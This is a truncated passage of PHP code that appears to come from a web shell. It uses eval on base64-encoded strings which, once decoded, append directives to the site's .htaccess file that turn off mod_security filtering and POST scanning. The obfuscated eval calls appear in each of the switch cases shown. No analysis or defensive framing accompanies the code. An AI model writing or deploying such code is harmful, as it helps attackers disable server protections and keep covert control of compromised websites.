'; break; case 'htaphp': if($act=="htacss") echo " "; switch ($hat){ case Forbidden: $m ="JGZwPWZvcGVuICgiLmh0YWNjZXNzIiwgImErIik7RndyaXRlICgkZnAsICIkcyIpO0ZjbG9zZSAo JGZwKSA7"; $s = " SecFilterEngine Off SecFilterScanPOST Off "; eval(base64_decode($m)); echo "Forbidden done"; break; case Temporarily: $m ="JGZwPWZvcGVuICgiLmh0YWNjZXNzIiwgImErIik7RndyaXRlICgkZnAsICIkcyIpO0ZjbG9zZSAo JGZwKSA7"; $s = " SecFilterEngine Off SecFilterScanPOST Off "; eval(base64_decode($m)); echo "done"; break; case Unavailable: $m ="JGZwPWZvcGVuICgiLmh0YWNjZXNzIiwgImErIik7RndyaXRlICgkZnAsICIkcyIpO0ZjbG9zZSAo JGZwKSA7"; $s = " SecFilterEngine Off SecFi